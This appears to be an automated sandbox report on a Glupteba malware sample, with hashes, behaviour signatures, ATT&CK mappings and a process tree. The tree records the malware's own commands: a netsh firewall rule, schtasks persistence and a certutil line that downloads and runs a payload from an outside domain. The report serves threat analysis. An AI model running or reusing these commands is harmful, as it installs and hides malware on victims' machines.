Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-08-2022 02:51

General

  • Target

    5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee.exe

  • Size

    3.9MB

  • MD5

    97951d49f248b773ca6d4d783749b8c3

  • SHA1

    8dfa35e2f0057f9f649fa7cef651b38abf7c8ebb

  • SHA256

    5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee

  • SHA512

    34a547d14e0713291c40bdfcfa43b991fe2d5c1b7b25b4e2e05e94f56b845c9396329f8c3cf14736fa6161324f1147b8c4d61b6fc478e8885ec1871f600066f5

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee.exe
    "C:\Users\Admin\AppData\Local\Temp\5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4964
    • C:\Users\Admin\AppData\Local\Temp\5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee.exe
      "C:\Users\Admin\AppData\Local\Temp\5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3580
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3616
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:552
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4724
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:876
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:1664
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1632
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1964

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    97951d49f248b773ca6d4d783749b8c3

    SHA1

    8dfa35e2f0057f9f649fa7cef651b38abf7c8ebb

    SHA256

    5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee

    SHA512

    34a547d14e0713291c40bdfcfa43b991fe2d5c1b7b25b4e2e05e94f56b845c9396329f8c3cf14736fa6161324f1147b8c4d61b6fc478e8885ec1871f600066f5

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    97951d49f248b773ca6d4d783749b8c3

    SHA1

    8dfa35e2f0057f9f649fa7cef651b38abf7c8ebb

    SHA256

    5d3808293fee496c2a48aa6c864bf91a6dd164404ebc005fbf49ba7478ed33ee

    SHA512

    34a547d14e0713291c40bdfcfa43b991fe2d5c1b7b25b4e2e05e94f56b845c9396329f8c3cf14736fa6161324f1147b8c4d61b6fc478e8885ec1871f600066f5

  • memory/552-147-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/552-153-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/552-142-0x0000000000000000-mapping.dmp
  • memory/552-146-0x0000000004800000-0x0000000004BA7000-memory.dmp
    Filesize

    3.7MB

  • memory/876-149-0x0000000000000000-mapping.dmp
  • memory/1632-152-0x0000000000000000-mapping.dmp
  • memory/1664-150-0x0000000000000000-mapping.dmp
  • memory/3580-136-0x0000000000000000-mapping.dmp
  • memory/3580-138-0x000000000457F000-0x0000000004926000-memory.dmp
    Filesize

    3.7MB

  • memory/3580-139-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/3580-145-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/3608-140-0x0000000000000000-mapping.dmp
  • memory/3616-141-0x0000000000000000-mapping.dmp
  • memory/4724-148-0x0000000000000000-mapping.dmp
  • memory/4964-132-0x0000000004427000-0x00000000047CE000-memory.dmp
    Filesize

    3.7MB

  • memory/4964-134-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/4964-133-0x00000000047D0000-0x0000000004EC6000-memory.dmp
    Filesize

    7.0MB

  • memory/4964-135-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB

  • memory/4964-137-0x0000000000400000-0x000000000267B000-memory.dmp
    Filesize

    34.5MB